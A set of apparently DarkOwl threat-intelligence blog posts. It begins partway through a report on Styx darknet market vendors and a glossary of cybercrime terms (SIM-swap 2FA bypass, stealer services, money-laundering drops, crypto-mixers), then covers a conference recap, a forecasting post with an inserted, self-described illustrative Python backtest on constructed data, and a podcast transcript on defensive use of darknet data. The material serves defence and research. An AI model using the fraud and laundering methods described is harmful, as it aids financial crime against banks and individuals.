There are two Telegram channels immediately associated with this vendor on Styx marketplace. Further research reveals other channels run by a vendor with the same name selling similar products on Telegram. One of the Styx-market associated channels advertises data for sale and recruitment posts. Purchases of the data posted on this site can be made through their linked Telegram bot channel. A support channel is also linked within this channel. The other channel consists of reviews of the vendor. 

Figure 12: 337 Diller selling services on Telegram; Source: DarkOwl Vision

Research from DarkOwl Vision indicates this vendor has been offering lookup services and fullz since at least 2021 both via Telegram and on popular darknet marketplaces and forums.  

Figure 13: Mapping 337 Diller using data from DarkOwl Vision

“Podorozhnik” sells drawing services as a vendor on Styx market, where a user can get in touch with them via the chat feature offered on the site. Drawing services is a term used for forged and fake documents. In addition to their presence on Styx, they also offer their fake documents for sale via dedicated Telegram channels. “Podorozhnik” advertised their drawing services on the darknet site DarkMoney in 2021. No Telegram channels are linked directly on Styx market, but there are multiple public channels connected to “Podorozhnik” on Telegram. For example, they have a Telegram channel dedicated to reviews. These show communication between customers and “Podorozhnik” about successful verifications. A Telegram channel advertising “Podorozhnik” claims they had over 900 positive reviews on a popular Russian forum.

Figure 14: Mapping Podorozhnik using data from DarkOwl Vision

As each of the three vendors researched appears to have been present on darknet forums and marketplaces for years before joining Styx, they are more likely to be sophisticated and legitimate vendors. Vendor reviews are an essential component in establishing trust on darknet marketplaces and reassuring potential buyers of the legitimacy of the vendor. Two of the three vendors have reviews readily available for potential buyers to evaluate, including Telegram channels dedicated to reviews. These reviews point to trust in the vendor. The vendors have also embraced Telegram for selling products and services and as a support system for customers. Telegram continues to grow as a main avenue for buying and selling darknet-related goods. Some of the Telegram channels associated with Styx marketplace vendors were created as early as 2021, while others have been created within the last year.

Final Thoughts

The products sold on Styx marketplace are hacker and financial-crime oriented. The market caters to sophisticated cybercriminals. Vendors offer access to multiple online banking and e-commerce sites. Money laundering services are strict and only for those who can meet the dollar minimum. While money laundering is risky, which is why vendors require a minimum for payments, vendors have been successful enough to continue offering the service. And despite the high price, there appear to be customers who are willing to pay. Financial institutions and the banking sector will need to remain wary given the account identity authentication techniques available for sale on Styx market. These include NFC BINs (NFC is what allows for contactless payment on cards) and vendors offering to set up funnel accounts, which can be used as a drop service to “drop” stolen funds. Much like cash out vendors, drop services are used for laundering illegally earned funds. For now, Styx market will provide a valuable outlet for cybercrime on the darknet as cybercriminals go after the online components of banking and come up with new methods for money laundering.



Table of Definitions

Word: Definition

2FA/SMS Bypass: 2FA is two-factor authentication and is used to help secure accounts. SMS text messages are a common way to deliver 2FA, often by sending one-time codes. Cybercriminals can achieve SMS bypass by SIM swapping or intercepting networks.

Business Full Info/Tax: Business full info consists of detailed PII that could be utilized by a cybercriminal to commit fraud or identity theft. Coupled with tax information, the bad actor would possibly be able to commit many forms of financial fraud, such as fraudulent wire transfers.

Installs for stealers: Some stealers are sold as pay-per-install services. A user can pay to download the malware and install it on compromised systems of their choice.

Anti-detect browsers: Anti-detect browsers can be used for privacy and anonymity online as they avoid detection by online web-tracking technologies.

Laundry Services: Laundry services are money laundering services that “clean” cash received from illegal activities and get the cash into the legal banking system.

FB/Google Logs: Logs are records of activity that take place on computer systems. Using a record of activity such as Facebook posts and Google searches, a bad actor could use this information for phishing texts, emails, and sophisticated social engineering campaigns.

Cashout Banks/VCC: VCC stands for virtual credit cards. Cashing out bank accounts and cashing out virtual credit cards can be used to steal funds or for money laundering.

Crypto-mixer: Crypto-mixers are used for obfuscation. They mix the cryptocurrencies of many users together to obfuscate where money comes from and who it belongs to. The money is later withdrawn to new addresses belonging to each user.

Stealer Services: Stealer services are the stealer-as-a-service market. Actors offer their stealer malware for sale for a customer to essentially rent and then compromise and access a device on their own. This way a customer with very little technical know-how can have access to sophisticated stealer malware. These are aimed at less-sophisticated users.

BG/SSN/DOB: Background check, Social Security number, and date of birth. This information can be used for identity theft, fraud, and social engineering.

RDP: RDP, remote desktop protocol, is a Windows interface that allows users to connect to another computer or server over the internet. Bad actors will sometimes use open RDP ports to install their ransomware on the victim’s system.

VDS: VDS stands for Virtual Dedicated Server and is essentially the lease of a dedicated server that the user controls completely because it is not shared with other customers. A VDS is the combination of a server, its hardware, and the operating system, run via a remote access component that allows the user to access their server over the internet.

VPS: VPS is a Virtual Private Server, and they are used for web hosting. Nation-state actors are known to use these in attacks as a proxy or bridge between the real server and the target, as well as for hosting RDPs, VPNs, and proxy gateways to hide the location of command and control servers. They are used to hide locations so as to evade security systems on targeted devices and to obfuscate the true IP addresses and locations.

DarkOwl Strengthens European Presence at ISS World Europe

June 16, 2023

Last week, DarkOwl participated in ISS World Europe in Prague. ISS World Europe prides themselves on being “the world’s largest gathering of Regional Law Enforcement, Intelligence and Homeland Security Analysts, Telecoms as well as Financial Crime Investigators responsible for Cyber Crime Investigation, Electronic Surveillance and Intelligence Gathering.” ISS World events (DarkOwl will be at a couple more this year) focus on the latest in cyber tools and methodologies specifically for law enforcement, public safety, government and private sector intelligence communities. The first full day of ISS events is dedicated to training and in-depth sessions. Trainings and topics covered throughout the event include how to use cyber to combat drug trafficking, cyber money laundering, human trafficking, terrorism and other nefarious activity that occurs all across the internet.

Representing DarkOwl this year at ISS World Europe was one of DarkOwl’s dynamic duos: David Alley, CEO of DarkOwl FZE, based in Dubai, and Ramesh Elaiyavalli, CTO of DarkOwl, based out of DarkOwl’s headquarters in Denver, CO.

The networking opportunities this year were unmatched. David expressed, “This was the best ISS Prague I have ever attended. The show continues to grow in importance.” Needless to say, the team looks forward to next year. In addition to networking with new prospects, David and Ramesh were able to meet with a number of current partners and customers, an opportunity which is invaluable to have roadmap conversations, gather feedback and catch up face-to-face. Throughout the event, top minds of the space share the latest technology, trends and thought leadership in the cyber community. Topics this year included the growth of Telegram, cryptocurrency de-anonymization, blockchains’ growing role in geopolitical conflict, policing Tor, info-stealer ecosystems, visual intelligence from IoT, AI, mobile tracking, and more.

Ramesh noted a common theme throughout attendees, conversations and presentations: “everyone is suffering from data fatigue – too much data and too little insights.” This emphasizes the importance of law enforcement’s need to invest in software and data solutions that deliver insights and make data easily digestible. DarkOwl plays an important role in providing valuable data and threat intelligence to this market.

Due to the layer of anonymity it provides, the darknet is often a hub for illegal activity. However, investigating crime on the darknet and deep web poses technical challenges, including the fact that darknet sites are continually coming online and going offline, with pages vanishing from one minute to the next. The technology DarkOwl leverages to scrape and index hidden digital undergrounds is key to the mission of obtaining proactive situational awareness for the protection of the nation’s security initiatives. DarkOwl Vision UI provides a user-friendly interface with powerful querying capabilities to search, monitor, and create alerts for critical information. DarkOwl Vision has been used to support local and federal police investigations, as well as work done in intelligence/fusion centers and federal agencies to uncover human trafficking, opioid selling, terrorism, security issues, and other illegal activity, making it the perfect tool for this audience to dive into.

Live Demonstration of DarkOwl Vision: Darknet Intelligence Discovery and Collection

The first day of the event, before booths were open, David Alley was able to give a live presentation to attendees demonstrating DarkOwl Vision: Darknet Intelligence Discovery and Collection. The team is thrilled to share that the conference room was filled to the brim with standing room only. The goal of this session was to further educate the international intelligence community on how threat actors on the darknet are evolving in their use of new tools and methodologies.

Vision UI is the industry-leading platform for analysts to simply, safely, and comprehensively search the largest commercially available source of darknet data. Vision provides a user-friendly interface with powerful querying capabilities to search, monitor, and create alerts for critical information.


DarkOwl looks forward to continuing our global presence at ISS events; you can see where we will be next and request time to meet with us.

Forecasting Cyber Threats

June 13, 2023

The darknet contains data critical to understanding criminal behavior and security risk, and companies need an understanding of their exposure on the darknet to determine risk and take mitigating actions. 

This report outlines DarkOwl’s new metric based on email and credential volume to measure an organization’s exposure. We tested our metric against 237 public cyberattacks occurring in 2021 and 2022 and found our signal was elevated within the last four months prior to an attack for 74% of the organizations. 
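The backtest described above, as an added example that is not DarkOwl’s DarkSonar code: the page does not describe the actual metric, so the elevation rule (weekly exposed-credential counts more than two standard deviations above a 26-week rolling baseline), the 120-day window and all four organizations’ data are constructed assumptions. It shows how a "signal elevated within the last four months prior to an attack" hit rate is computed, including the case where a spike occurs but falls outside the window.

```python
"""Backtest of a darknet-exposure signal against known attack dates.

Added example, not DarkOwl's code. The elevation rule, window length and all
sample data below are assumptions constructed for illustration.
"""
from dataclasses import dataclass
from datetime import date, timedelta
from statistics import mean, pstdev

LOOKBACK_DAYS = 120    # "within the last four months prior to an attack"
BASELINE_WEEKS = 26    # history used to estimate an org's normal volume (assumption)
Z_THRESHOLD = 2.0      # weeks >= mean + 2 sigma of the baseline count as "elevated" (assumption)


@dataclass
class WeeklyCount:
    week_start: date
    exposed_credentials: int   # credentials for the org's domain observed that week


def elevated_weeks(series, baseline_weeks=BASELINE_WEEKS, z=Z_THRESHOLD):
    """Return the week_start dates whose count sits >= z std devs above the
    rolling baseline formed by the preceding `baseline_weeks` weeks."""
    out = []
    for i in range(baseline_weeks, len(series)):
        window = [w.exposed_credentials for w in series[i - baseline_weeks:i]]
        mu, sigma = mean(window), pstdev(window)
        if sigma == 0:
            sigma = 1.0   # flat history: treat a rise of one credential as one sigma
        if (series[i].exposed_credentials - mu) / sigma >= z:
            out.append(series[i].week_start)
    return out


def signal_before_attack(series, attack_date, lookback_days=LOOKBACK_DAYS):
    """True if any elevated week starts inside the lookback window before the attack."""
    start = attack_date - timedelta(days=lookback_days)
    return any(start <= wk < attack_date for wk in elevated_weeks(series))


def backtest(orgs):
    """orgs: list of (name, series, attack_date). Returns {name: hit?}."""
    return {name: signal_before_attack(series, attack) for name, series, attack in orgs}


def hit_rate(orgs):
    """Fraction of attacked organizations whose signal was elevated in the window."""
    results = backtest(orgs)
    return sum(results.values()) / len(results)


def make_series(start, counts):
    return [WeeklyCount(start + timedelta(weeks=i), c) for i, c in enumerate(counts)]


def build_sample_orgs():
    """Constructed weekly counts for four fictional organizations (not real data).
    52 weeks of ~10 exposed credentials per week with mild noise, each attacked
    on 2022-01-03, the week after the last observation."""
    start = date(2021, 1, 4)
    baseline = [[9, 10, 11][i % 3] for i in range(52)]
    attack = date(2022, 1, 3)   # lookback window therefore starts 2021-09-05

    def with_spike(week_index, value=60):
        counts = list(baseline)
        counts[week_index] = value
        return counts

    return [
        ("org-a", make_series(start, with_spike(45)), attack),   # spike 2021-11-15: inside window
        ("org-b", make_series(start, baseline), attack),         # no spike at all
        ("org-c", make_series(start, with_spike(28)), attack),   # spike 2021-07-19: too early
        ("org-d", make_series(start, with_spike(40)), attack),   # spike 2021-10-11: inside window
    ]


if __name__ == "__main__":
    sample = build_sample_orgs()
    for name, hit in backtest(sample).items():
        print(f"{name}: elevated in window = {hit}")
    print(f"hit rate: {hit_rate(sample):.0%}")   # 50% for the constructed data
```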


To learn more how DarkSonar can inform threat modeling, third party risk management, cyber insurance, and potentially predict cyber threats, contact us.

Data and the Dark Web: What is it, where is it, and why should we care?

June 07, 2023

Alison Connolly Halland, DarkOwl’s CBO, and Andrew Bayers, Head of Threat Intel at Resilience, discuss the ways data is collected on the darknet and the tools protecting business information, on Building Cyber Resilience Podcast brought to you by Resilience.

What you’ll learn:

  • The ways tools like DarkOwl use threat intelligence to improve resilience.
  • The importance of having layers in your security strategy.
  • Action steps for using darknet information for good.

For those that would rather read the conversation, we have transcribed it below.

NOTE: Some content has been edited for length and clarity.


Alison: We searched for the organization’s email addresses that had been exposed. Those came up. There were plain text passwords associated with them for someone that was actually on the, on the call, which happens all the time. But the part that was embarrassing is their plain text password was not something you would want. My guess was they made it as a 17 year old teenage boy and hadn’t changed it yet.


Ann: Welcome to the Building Cyber Resilience Podcast by Resilience. I’m Dr. Ann Irvine, Chief Data Scientist and Vice President of Product Management.

Richard: And I’m Richard Seiersen, Chief Risk Officer.

Ann: That was DarkOwl’s Chief Business Officer, Alison Connolly Halland, at the top of the show sharing why it may be time to update your password if you haven’t changed it since high school. It’s because of her company’s innovations that her joke is just that and not a breach that destroyed a business.

Alison: We are essentially darknet experts. So what we do 24/7 is we pull content off of the darknet, we park it in our own database, and then we provide our clients who are companies, not individuals, access to that data. Where our expertise lies is in the act of the collection – collecting data off of the darknet is not an easy task. And then number two, in filtering it, sorting it, layering on all of the bells and whistles on top of it so that you could go into our database and type in your social security number, up is gonna hopefully pop nothing, but if it does, it would show you those pages on the darknet that we, DarkOwl, have discovered that has that number present.

Ann: Alison originally started out in finance but was intrigued by some of her consulting clients in the security space. She eventually took the leap and joined the DarkOwl team in Denver, Colorado.

Alison: I’ve been here 6 years and we’ve been through a bunch of iterations and it’s been a really fun company to grow with. There’s just so much happening in the cybersecurity landscape that it’s great. I love it.

Richard: Alison’s work on the front lines helping security professionals use data from the darknet to inform their day-to-day operations is a very specific niche asset to the cybersecurity industry. But it’s important to define exactly why your work is so critical.

Andrew: Why would the CISO at a company care about what happens on the dark web? They have a website on the surface web, they don’t operate on the dark web. But seeing what’s happening today and where the conversations are going, that can help in the prioritization of how you address vulnerabilities. So threat intelligence, I like to say, puts a lot of the why behind a lot of the security controls we and our partners recommend to companies.

Richard: That’s Andrew Bayers, Head of Threat Intel at Resilience. Before this role, however, he wore several hats.

Andrew: I started in film school in New York City working at HBO on Sopranos and Sex and the City. And 9-11 happened and I rushed to a Marine Corps recruiting station and shipped off to Parris Island where I went through bootcamp and the Marine Corps sent me to the Defense Language Institute where I learned Korean and Chinese Mandarin. And then I worked on behalf of the Department of Defense and Marine Corps at the National Security Agency for the majority of my adult life. And that’s how I got into the cybersecurity space. So most of my work prior to rejoining Resilience was as a nation-sponsored, advanced persistent threat actor collecting foreign intelligence against our nation’s and allied nations’ foreign adversaries. So yeah, that’s me.

Richard: Andrew is in the trenches at Resilience, using threat intelligence tools like DarkOwl to not only protect our company but also to achieve our mission – to help our clients stay ahead of the bad guys.

Andrew: You know an organization that wants to protect their posture and their critical business functions, looking at the darkweb for those types of threats is critical.

Ann: In this episode with Alison and Andrew, we explore both sides of the security workflow, from learning how the data is collected and organized to why it is necessary for making business decisions both proactively and reactively. What is the darknet and why should we care about it? Why are layers so important to build into your cybersecurity strategy? Do you have to work in a basement and wear a black hoodie in order to access this information?

Richard: Alison and Andrew answer these questions and offer valuable action steps for how this underworld of information can be used for good. And no, in case you are wondering, a basement office and black hoodie are not required unless that's your style, of course, which is totally cool. Anyways, let's get into it.

Alison: In some ways, people are overly confident on the darknet because they believe that given the lack of IP addresses and cookies and what not, remaining anonymous is kind of its defining feature, so there is kinda some false sense of security there, that even if people are looking at that content, they can't trace it back. The other thing I think is really funny, or I don't know why it is funny because I was an econ major and I should know that all these market rules apply whether it is legal or illegal, is that the quest to be the best in the customer success department in the darknet is very much present. So there's a lot of credit card forums, my favorite one says "we are here to serve our customers, we are the best! We ship overnight, free shipping, we are extremely reliable…" you know, reading the verbiage just makes you laugh, because you think these are criminals, but like any business they are trying to win and maintain customers.

Ann: Same with ransomware gangs, right? They have entire customer success divisions.

Alison: Yup!

Andrew: Bad guys are in the business of business too, right?

Alison: Exactly.

Ann: Mm-hmm.

Richard: The darknet is an encrypted layer of the internet that cannot be found through regular search engines like Google. It is used mostly for illegal activities and is a breeding ground for data leaks. Laughs aside, the darknet is not a space you want to enter without proper preparation, tools and support.

Alison: You know, you run the risk of potentially running into content you don't want to see, visually, you also run the risk of ending up in maybe a marketplace or a forum and potentially exposing your own identity without knowing it. And I think the other one, the third one, which is the reason we, DarkOwl, are in business is it's an extremely, extremely inefficient place to navigate. So if you think about the surface web, you go onto Google, type in your search term, and there are all the results and we all trust that Google has gotten that right. That's why they are who they are. The darknet is not structured in that way. So if you were to go onto Tor, which you can, that is not an illegal act in itself. It's just very hard to navigate. There are no nice clean URLs to find, there are no pretty search engines or search bars, so you're gonna burn a lot of time frankly.

Ann: While the anonymous factor that Alison highlighted earlier is certainly part of the draw to the darknet, it’s not entirely true. Leaders like DarkOwl are making the data more searchable to help companies identify specific actors on the darknet through graphing.

Alison: So I mean, part of it is us, as we collect all of this data and we’re indiscriminate in how we do that. And what I mean by that is we don’t look at, look at a page on the darknet and say, oh, this is outside of our industry – we’re not gonna grab it. We always grab it. And then once we do, the first thing we do is just tokenize everything that we see. Do we see social security number? Do we see an email address? Do we see a domain? Do we see an IP address? And obviously there’s tons of free text in between there, but we’re gonna tokenize as many items as we can, right? Is there an ampersand, like a threat actor name? And then once you’ve done that, like you said, it becomes really interesting when you can graphically represent the information, right? If you are a seller on a marketplace and we can connect you to a different seller that has a similar name that was, you start to play that game, which becomes really powerful in the investigation space. We are extremely strong on the identification of entities within the data. The graphing piece we are adamantly working on and have made some huge strides, but we haven’t, we definitely, if I’m being honest, we haven’t perfected that piece yet. And some of our clients actually use their own graphing abilities on top of our data.

Richard: So very interesting business model. And I’m just curious, maybe you can tell me about the type of clients you have and the threat intelligence groups and folks like that, that are in these organizations. I just have to assume their use cases are varied, but I’d like to hear more about that.

Alison: I like to bucket our clients into three groups. There’s one that people don’t often think of, that is where the majority of our clients sit. So number one, we do serve government and law enforcement. If you work for the DEA and you are in charge of tracking down folks selling fentanyl, you would wanna have access to the darknet where they’re actually doing that. And the DEA is not a client for the record, but that is one bucket of our clients – although the smallest.

Number two is large enough corporations where the risk of having their own organization exposed on the darknet is worth looking at this data set. So think Fortune 1000, you're the CISO of Nike, and you wanna know, is someone targeting my executives? Is someone going after my IP address? Is someone talking about a ransomware attack, or are my newest designs of my Nike shoes being sold? Counterfeiting is a big use case for us. So clients that have products that are being sold in counterfeit markets. So those are companies that are purchasing DarkOwl data and they're looking at it for their own edification. That's bucket number two.

And then interestingly, the biggest bucket of our clients are clients that are purchasing DarkOwl data, aggregating it and looking at it on behalf of their clients. So most of those folks sit in the cybersecurity industry. So it's other cybersecurity companies that are, and we are essentially that darknet component. So I sort of like to think of it – you buy a Dell computer and it, you know, they used on the ad, they'd be like, powered by Intel and then it would make that little noise. So, it's DarkOwl or their darknet is powered by DarkOwl. So, and that runs the gamut. They could be layering it on top of social media data. They could be just doing penetration testing and they're using our data. They could be like you all in the cyber insurance space and they're looking at DarkOwl across tons of potential companies. So that's where the majority of our data and our clients reside is those that are looking at it on behalf of their clients.

Ann: At Resilience, this is how we utilize DarkOwl. Andrew Beires, Head of Threat Intel, is quick to point out that what he is looking for in his role falls right in between the bad activity happening on the darknet and the good activity.

Andrew: You hear about the dark web and the news and really all the conversations you hear about it are about most of the bad things that are happening, right? So, you know, the illicit financing, the money laundering, the drug, narcotics sales, the gang activity, the criminal underbelly, sort of like place of communication. But there are actually a lot of good things going on where people in more oppressed nations who have, you know, a difficult time getting information out of their countries and sharing that with the world, that’s a great place to do that. There are journalists there, whistleblowers, there are people doing good on the dark web. So there’s good stuff too, if that’s what you meant by good. Now there’s a lot of juicy stuff that we care about, but none of it is good. None of that is good, right?

Richard: So the juicy stuff goes under the general rubric of threat intelligence. I always like asking people what is threat intelligence and how would I know it’s happening to me?

I always like asking people that question because the answer points to why we do what we do at Resilience. Andrew highlights exactly how this plays out in his day-to-day workflow.

Andrew: You know, it’s like know your enemy, right? So knowing the people behind the keyboards that are attacking you, or have the potential to attack you, what their behaviors are. Like, what are the types of malware that people are purchasing? What are the trending vulnerabilities that are being discussed? So we had pretty strict criteria about the things that we want to engage directly with our customers about, and it has to meet three pieces of criteria. One, the vulnerability, so we are consistently evaluating the posture of our book of business. And so, and that’s company by company. And with the help of a lot of great people in engineering and data science, we are able to do this on a regular basis that a lot of it is automated. And so for us, when we see a company that, let’s say we, we see a vulnerability that is associated with some asset that they have exposed to the internet.

So first, is it remotely accessible? Like is it exposed to the internet, or is this some local vulnerability where there would be sort of a higher bar of entry in order to get to that asset? So those aren't the types of things we would really see from what we do. So it has to be remotely accessible. So remotely exploitable, right? It has to be our customers. So, you know, not a CVSS score, right, of critical. It doesn't necessarily have to be a critical vulnerability, but it becomes a critical vulnerability to us if we know attackers are exploiting it actively in the wild or a proof of concept has been released on how to exploit that vulnerability. The third piece is there are actionable mitigation or remediation measures that have either been released by the vendor or a security researcher or somebody. So there is a specific action that the customer can take to mitigate or remediate. And then when we identify those, so it meets those criteria, we engage directly with the customer to notify them and help them through the process of remediation.

Richard: One follow-on to that. So one vector of course is the remote. But many bad guys these days, particularly ransomware, they're attacking what we call layer A, the human, right? So be it spear phishing or phishing in general, or you think about business email compromise, all these other vectors. What's the bridge between that threat intelligence and how you work with your customers?

Andrew: Sure, the dark web is a great place to hunt for potential insider threats. And that doesn’t necessarily mean it has to be a malicious insider. Maybe it’s a negligent or unintentional error on the part of an insider that led to something like their credentials being exposed. Maybe it’s something through their own personal life that was exposed and then somehow that is, you know, associated to it enabling some sort of access to that organization. So another piece on the malicious sort of insider that the dark web is the place where people sell access to threat actors. So it is also the place where threat actors advertise paying for access to specific things like, “hey, do you work for this type of company? If so, and you have access, we would like to buy that from you.”

Ann: Wow, that's terrifying to think about people sort of selling their access as an employee of an organization. A comparable thing happens, of course, in working with any nation state for espionage. But how often is that really happening? Is that happening frequently?

Andrew: Every day. And it’s on the rise, I would say like more in 2022 than in 2021. And I mean, the expectation is more in 2023. So our CISO loves to make this joking comment and I find it funny, but it is scary. Like you said, it’s terrifying, right? We’re all just one bad day away from being that threat actor selling access.

Ann: Yeah. In a way, I kind of hate talking about this in a public venue like this podcast, you know, I don’t wanna advertise that this is a thing… hey, go to the dark web and you can make a quick buck with your corporate credentials. But sounds like that could be the case.

Richard: I’m just endlessly fascinated with the area of threat intelligence because the possibilities in terms of the size of data and the types of questions that can be asked are endless. Obviously you’ve made it clear that one of the most plausible places to look for badness is the dark web as if that really constrains the search surface, for information. How is it that you go about getting at actionable information? You mentioned a little bit about data science and other forms of magic and mysticism, but maybe you can unravel that a little bit for our listeners. Like how does that actually work out? Because the reality is the dark web, it’s a big mysterious place, right? So how do you do it?

Andrew: We have relationships with intelligence providers both in the private sector and in the government. So, you know, this may be story time. So we’ve got alerts set up. If there are specific keywords maybe mentioned, so I’m not having to read, our teams and having to read every chat in every forum across the entire internet. But we obviously care about the insurance industry a lot. There is a threat actor selling access and you know, of course they will anonymize it, right? Not give the keys to the kingdom in the advertisement. So the company was not named, but it was an insurance company, global insurance company. And what was given was the zip code. So just piecing that together and working with one of our co-founders, we were able to figure out exactly which company that was.

And for us on the security side, we are what we consider white hats. So there’s this ethical responsibility, a very focused moral compass. So we did what we considered the right thing, which is to contact this insurance company and let them know that this was going on. And it was through scouring LinkedIn to find, just doing a little open source intelligence like who works at this company in security and would even begin to understand like why I’m trying to message them. And so we were able to get in contact with ’em, this was a Sunday afternoon and it went until maybe 11 at night and they were incredibly thankful. So that was a success story. Maybe we were able to prevent an attack and sort of shut that down before it led to an extortion event.

Richard: That’s awesome.

Ann: Andrew's insight shows how these tools are used at a firm like Resilience to stop an attack in its tracks. Alison provides two more examples of real world use cases from a more proactive perspective.

Alison: So there’s absolutely a way to look at this data set and sort of get ahead of it. And I think, you know, the most simple example would be, let’s say you’re an organization and all of a sudden next Tuesday you see that 200 of your employees email addresses are part of a, a breach or a compilation or someone, someone says on a forum, “I have 200 email addresses and plain text passwords associated with this company.” And oftentimes they’ll actually put those up as kind of proof of life. And you know, the use case there, Rich, is what are the, if you can get that sample, which we at DarkOwl would pull down and would be in our database, then it becomes a much easier reconnaissance game of instead of just saying, oh my goodness, we have content on the darknet – I don’t know what it is, I don’t know what to do about it, I don’t know how it got there. If you can pull down those email addresses and say, wow, it turns out all 200 of these employees started on September 1st, or all 200 of these employees attended a conference in Florida two months ago, or all 200 of these employees are no longer with the company. Those are three totally different incident responses. You know, one of ’em you don’t even have to deal with, right? One of ’em is, let’s go to our HR platform, why are they, they were all onboarded, but it gives you the context to then figure out what the problem is rather than waiting for it to show up on the front page of the Wall Street Journal that your organization has been subject to XYZ.

So I think the context can provide that proactive piece and allow companies to understand, and especially that definitely follows suit in regards to some of its more, you mentioned qualitative versus quantitative. Some folks are just looking at it for, in sort of the way you look at Glassdoor content, right? What are people saying about our company? Is there negative talk about it, or you know, is it notorious for being easy to break into? I mean there's a lot that you can gather from sort of the sentiment about how people talk about organizations that can be telling too, for an organization. We do have a sector of, and this is more recent, but it's growing quickly, of clients who are in the TPR, third party risk platform or management, where they're looking at, think if you're a huge organization and you're considering all these different vendors, you kind of want to know how risky is that, do I have some that have a great deal of exposure on the darknet, which would be a leading indicator that they may not be as buttoned up as you think.

And then that same sort of use case translates really well to the M&A [mergers and acquisitions] space. So we have folks that are looking at the data in regards to potential mergers or acquisitions saying, you know, is this a company I wanna purchase or merge? Or they get a sense for what their hygiene is in some ways.

Ann: I have one kind of funny question. Sometimes when I find myself in the DarkOwl UI, as I said, I search for myself, the next thing I do is just sort of look at people’s, pick a company that I care about. You know, I’ll just kind of browse plain text passwords. I find them endlessly entertaining to just read like a novel. Do you have any interesting or funny anecdotes about just like, things that you’ve read or seen or been entertained by in this data?

Alison: Yes, absolutely. So, you know, obviously we do a lot of demos of our platform for potential customers and we almost always search for their organization in front of them and show them what content we have. And we have had, I think I’ve been in the room for two, one of ’em was in person, one of ’em was on the phone, but two demos that were extremely embarrassing. And what I mean by that, Ann, is we searched for the organization’s email addresses that had been exposed. Those came up, there were plain text passwords associated with them for someone that was actually on the call and which happens all the time. But the part that was embarrassing is their plain text password was not something you would want.

Ann: Didn’t read it aloud?

Alison: Yeah, no, we did not read it out loud.

Ann: Amazing.

Alison: My guess was they made it as a 17-year-old teenage boy and hadn't changed it yet. So…

Ann: Or that’s what they still are on the inside.

Alison: I'll leave it at that. So we've had some interesting passwords, but yeah, I agree with you. I also read through plain text passwords like a novel. I find it fascinating.

Richard: Embarrassing passwords aside, these examples show how having access to this data allows your organization to be proactive. As Alison highlighted, organizations are using it to hedge their bets on mergers and acquisitions. Another emerging use is occurring in the insurance underwriting space.

Alison: I think we’re kind of at stage one, right? If I was someone underwriting policies for a company, I would just want to know that baseline, like what does that presence look like on the darknet? And I think where we can head, which would be a really neat space to be in, is can we look at that data and then incentivize that company to better their practices, to lower the risk, lower the policy. You know, I think there’s, that’s kind of the proactive piece that I think would be, that we’re headed towards. And there’s obviously a lot of work to be done, but the data can be informative and I think you guys are doing a really nice job at using it.

Richard: Actually, that’s a great opportunity for me to ask Ann a question about how we use your data in our models. Yeah, I’m actually very curious. And you know what, I bet you other people are too.

Ann: Yeah, I mean we use it for underwriting. So we collect data and we look at the results, our models consider the results with exactly what you said Alison, the sort of understanding that the goal is that organizations are not the worst among their peer group.

As I shared, Resilience uses DarkOwl for everything from defensive measures to proactive underwriting insight. Now every business will use this information differently depending on your unique goals, but the key is to use it to your advantage. How do you make sure your company is taking the optimal steps towards cyber resilience? Andrew has some advice.

Andrew: It's like trying to align your sort of cyber risk with your critical business functions and how those align and if it makes sense financially. To try to build a capability in-house, that is one way, right? But there are also businesses built, that have been members of the intelligence community previously or black hat types previously, that do this every day. And so paying for that as a service is another, is another option. But there is no doubt about the value of insight into what is going on on a lot of these forums. And then sort of back to your question as well, Dr. Ann, a lot of the groups that exist, they have very specific requirements in order for you to be let in the room really, right? So sometimes it could be a proven track record of successful attacks.

So those are ways they are trying to evade obviously being on these more accessible forums. But back to your question, Rich, there are companies that are built for this. So whether or not it’s better to build an in-house capability or pay for that as a service, either way there are so many reasons why you want to know what’s going on. One, you know, is your company being targeted right now today? Do any of your credentials show up in data dumps? How do I prioritize like patching vulnerabilities? Not saying the only factor to consider is what’s being talked about, what is trending on the dark web, but that is a factor.

Richard: So let me and Ann, I have to drill in here cuz it's like on this path of operationalizing this stuff, you know, there was the Lockheed Martin kill chain and that was fun to say, I like saying kill chain, but now there's MITRE ATT&CK, right? And you know, you have all the STIX and TAXII and you know, the idea that log aggregators or a SIEM, whatever you like to call them now, and SOAR are able to consume, in theory, this data and you have data sharing and all that stuff with the intent. I think the belief as a buyer, this is as a consumer, as a CSO, the idea is, hey, you can scale out this sort of stuff without having to have an Andrew and you can make it actionable. That rests uneasy with me. This is maybe just my own bias, maybe you can tell me, what sort of value do you get out of like MITRE ATT&CK, STIX and TAXII? How have you seen that get operationalized in the SIEM space or log aggregation space? What are your, again, getting back to the CSO or security person listening and thinking about how do I do this and what do I need to look out for? I know that was a big question, but there you go.

Andrew: Sure. So I would say, you know, specifically there is value in like the STIXs and the TAXIIs, right? So any specific indicator of compromise. Anything that I could ingest and automatically be able to detect or flag something specific that is known to be used by a threat actor, that's great. Like how it all, so how you prioritize what to do first. Like that I think is where the human element comes in. Whether it's from an incident response perspective or whether it's trying to, for instance, stop an attack during the reconnaissance phase, like you mentioned the kill chain, so before initial access. Some of our partnerships enable us to have alerting from the intelligence community where they are sitting on the internet and they may see something like a staging sort of operation or preparations like planning being conducted to potentially target a company and then being able to alert that company. Like there's such a human element to it. I don't ever see the entire process being completely automated away. I mean that would be, sign me up, I'll find a nice warm beach to sit on.

Richard: Andrew's point about humans being inseparable from and paramount to this entire process, no matter how many autonomous upgrades and AI insights we add to it, is key. To illustrate how these layers of security create a strategy that works, I shared a recent story that caught my attention.

There’s an NFT loss where the, where it was guy who’s the CEO of one of these NFT processor, he had his wallet or something hacked into, he lost millions of dollars of NFT value, but he said it didn’t impact his company. Cause they have, they have multi-factor authorization. So I was just thinking about this is the practical thing when we think about customers, like if we start seeing like there’s this campaign for business email compromise, it’s associated this, we see it that it’s a long term drain by thousands of cuts, but these are the practical things that you can do as opposed to just patching, here’s some business process you can put in place. Here’s some other things you can put in place that will, you know, that yes, it’s very shift, right? But could be remedial or really impact reduction. Cause we always get so focused on what can we do that’s innovative from a technical perspective that’s important, but there’s this whole other side of responding to actual loss.

Andrew: It does seem that with novel techniques for attacking, right? Often it comes back to the same control, which, if implemented correctly, could prevent it.

Richard: Yeah, it could be hugely preventative. Yes, we can put great in-line controls in place. Yes, we can put great endpoint, yes, we can do great training, that's good, but are there things that we can do that in theory can potentially mitigate this? It becomes harder in large organizations. Like how many people actually are able to move money around? Do you even know? And that's, that becomes part of an attack surface, right? So that's interesting too.

